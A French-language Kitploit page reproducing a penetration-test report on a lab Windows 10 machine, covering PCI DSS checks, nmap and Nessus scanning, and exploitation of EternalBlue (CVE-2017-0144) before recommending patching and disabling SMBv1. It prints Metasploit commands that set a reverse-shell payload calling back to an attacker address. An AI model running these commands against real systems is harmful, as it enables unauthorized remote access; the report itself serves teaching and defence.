Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
VAPT-Report-on-SMB-Exploitation-in-Windows-10-Finance-Endpoint — Ce rapport décrit un engagement VAPT structuré axé sur la conformité PCI DSS, l'énumération des services SMB et l'exploitation de CVE-2017-0144 (EternalBlue) sur une machine Windows 10 au sein d'une infrastructure orientée finance. | Kitploit
Outils/GitHubGitHub/adityabhatt3010/vapt-report-on-smb-exploitation-in-windows-10-finance-endpoint
ReconnaissanceAnalyse des VulnérabilitésExploitationSécurité RéseauTests d'IntrusionApprentissage et Éducation
GitHubadityabhatt3010/vapt-report-on-smb-exploitation-in-windows-10-finance-endpoint

VAPT-Report-on-SMB-Exploitation-in-Windows-10-Finance-Endpoint

Ce rapport décrit un engagement VAPT structuré axé sur la conformité PCI DSS, l'énumération des services SMB et l'exploitation de CVE-2017-0144 (EternalBlue) sur une machine Windows 10 au sein d'une infrastructure orientée finance.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
151il y a 1 anPas encore vérifié
Partager

Rapport VAPT sur l'exploitation SMB dans un point de terminaison Windows 10 du secteur financier

Ce rapport décrit un engagement VAPT structuré axé sur la conformité PCI DSS, l'énumération des services SMB et l'exploitation de CVE-2017-0144 (EternalBlue) sur une machine Windows 10 au sein d'une infrastructure orientée finance.


🔐 Introduction

Les institutions financières sont confrontées à certaines des exigences de conformité les plus strictes dans le domaine de la cybersécurité. Avec des données clients sensibles et des informations de titulaires de carte en jeu, des erreurs de configuration de sécurité peuvent entraîner des violations catastrophiques. Cette simulation VAPT a été réalisée pour évaluer la posture de sécurité d'un système d'extrémité basé sur Windows 10 du point de vue de la conformité PCI DSS, tout en identifiant et en exploitant les vulnérabilités connues dans les services SMB exposés.

La simulation couvre plusieurs étapes, de la reconnaissance et du scan de vulnérabilités à l'aide de Nessus à l'exploitation réelle via Metasploit. Le rapport souligne en outre l'importance du durcissement des points de terminaison, de la gestion des correctifs, de l'application des pare-feu et de l'alignement PCI DSS pour maintenir l'intégrité des réseaux financiers.

Aditya Bhatt


Rapport d'évaluation des vulnérabilités et de test d'intrusion (VAPT)

Cible : Hôte Windows 10 – Point de terminaison du secteur financier

Préparé par : Aditya Bhatt
Fonction : Analyste VAPT | Professionnel en cybersécurité
Contact : [email protected] | +91-9818993884


Résumé exécutif

Ce rapport présente les résultats d'un test d'intrusion mené sur un point de terminaison Windows 10 soupçonné de traiter des données financières et des transactions par carte de crédit. L'objectif était de valider les implémentations de contrôles PCI DSS et d'identifier les vecteurs d'attaque potentiels qui pourraient compromettre les données des titulaires de carte.

À l'aide de Nessus, l'hôte s'est avéré vulnérable à CVE-2017-0144 (EternalBlue) — une vulnérabilité SMB critique. Le framework Metasploit a ensuite été utilisé pour exploiter cette faille et obtenir un accès shell distant non autorisé. Ce rapport souligne l'importance d'une gestion rapide des correctifs et du durcissement des services réseau pour éviter les violations de données dans les systèmes financiers.


Objectifs

  • Évaluer la conformité aux exigences PCI DSS sur un point de terminaison cible.
  • Énumérer et identifier les vulnérabilités sur un système Windows 10.
  • Exploiter les vulnérabilités découvertes à l'aide d'outils et de techniques standards.
  • Recommander des actions de remédiation pour améliorer la sécurité et la conformité du système.

Méthodologie

Tâche 1 : Évaluation de la conformité PCI DSS

Six objectifs principaux et douze exigences du PCI DSS ont été examinés. Les principes clés incluent :

  • Mettre en œuvre des pare-feu et modifier les paramètres par défaut du fournisseur
  • Chiffrer les données des titulaires de carte lors du stockage et de la transmission
  • Utiliser un antivirus, des configurations sécurisées et une gestion des correctifs
  • Appliquer des mécanismes de contrôle d'accès et d'authentification
  • Surveiller, journaliser et effectuer des scans de vulnérabilité réguliers
  • Créer et appliquer une politique de sécurité à l'échelle de l'organisation

Tâche 2 : Découverte de vulnérabilités

Système cible :

  • Windows 10 VM
  • Adresse IP : 10.10.195.105
  • Sous-réseau : 255.0.0.0

Outils utilisés :

  • Nmap pour la découverte de ports et de services
  • Nessus pour le scan de vulnérabilités
  • Metasploit pour l'exploitation

Commandes clés :

root@kitploit:~
nmap -sn 10.10.195.105

5

root@kitploit:~
nmap -sV -p445 10.10.195.105

6

root@kitploit:~
nmap -F 10.10.195.105

1

  • Le port 445 (SMB) trouvé ouvert
  • Nessus a identifié la vulnérabilité : CVE-2017-0144 (EternalBlue)

2 png
3
4


Tâche 3 : Exploitation

Scanneur :

Tentative de scan Nessus :

7
8
9
10
11
12
13
14
15

Tentative de scan Metasploit :

root@kitploit:~
use scanner/smb/smb_ms17_010
set RHOSTS 10.10.195.105
run

16
17

Module d'exploitation :

root@kitploit:~
use exploit/windows/smb/ms17_010_eternalblue
set payload generic/shell_reverse_tcp
set RHOSTS 10.10.195.105
set LHOST 10.17.88.138
exploit

18
19
20

  • Résultat : Shell distant ouvert avec succès sur la machine cible Windows 10
  • Accès non autorisé au système sensible confirmé

Principales constatations

  • SMBv1 actif et exposé au réseau
  • EternalBlue (MS17-010) non corrigé et exploitable
  • Le scan Nessus a révélé plusieurs vulnérabilités de haute sévérité
  • Absence de pare-feu ou de segmentation réseau empêchant le mouvement latéral
  • Services réseau par défaut inutilement ouverts

Analyse des risques


Recommandations

  1. Gestion des correctifs

    • Appliquer immédiatement la mise à jour de sécurité de Microsoft pour CVE-2017-0144
    • Mettre en œuvre un scan de vulnérabilité continu et des cycles de correctifs
  2. Durcissement réseau

    • Désactiver complètement le protocole SMBv1
    • Limiter l'accès au service SMB aux réseaux internes de confiance uniquement
  3. Application des pare-feu

    • Bloquer le port 445 sur les interfaces publiques
    • Utiliser un IPS/IDS pour détecter les attaques basées sur SMB en temps réel
  4. Surveillance continue

    • Déployer des outils SIEM pour détecter les anomalies et corréler les événements
    • Planifier des scans Nessus fréquents pour évaluer les nouveaux risques
  5. Conformité PCI DSS

    • Appliquer l'authentification multi-facteurs et le principe du moindre privilège
    • Chiffrer toutes les données des titulaires de carte en transit et au repos
    • Effectuer des audits réguliers pour garantir une couverture complète des contrôles
  6. Formation de sensibilisation

    • Organiser des sessions de formation périodiques pour les équipes informatiques et les parties prenantes
    • Inclure le traitement sécurisé des données financières et les procédures de réponse aux vulnérabilités

Conclusion

Cet engagement a clairement démontré que des services non corrigés et obsolètes comme SMBv1 peuvent conduire à une compromission complète du système à l'aide d'exploits connus publiquement. La vulnérabilité EternalBlue exploitée ici est un exemple classique de pourquoi une mise à jour rapide, une minimisation des services et un scan proactif sont non négociables dans les infrastructures financières.

Sans conformité à des cadres comme le PCI DSS, les organisations risquent à la fois des sanctions légales et des violations de données dévastatrices.


🛡️ Réflexions finales

Les lacunes de sécurité se cachent souvent derrière des protocoles obsolètes et des correctifs oubliés. Cet engagement a réaffirmé la criticité de traiter chaque service, en particulier ceux comme SMB, non pas comme une commodité, mais comme une surface de risque.

Une cybersécurité solide dans le secteur financier commence par une vigilance continue, des politiques appliquées et une gestion des correctifs sans compromis.

Merci d'avoir lu ce rapport. J'espère qu'il a apporté de la clarté, des perspectives pratiques et un renforcement de pourquoi la validation continue de la sécurité est essentielle, en particulier lors du traitement de données financières.

– Aditya Bhatt
Analyste VAPT | Professionnel en cybersécurité

Télécharger l’outil
Description du risqueImpactProbabilitéScore de risque
Exploitation d'EternalBlue (SMBv1)ÉlevéÉlevéeCritique
Absence de gestion des correctifsÉlevéMoyenneÉlevé
Absence de contrôles d'accès réseauMoyenÉlevéeÉlevé
Non-conformité au PCI DSSÉlevéÉlevéeCritique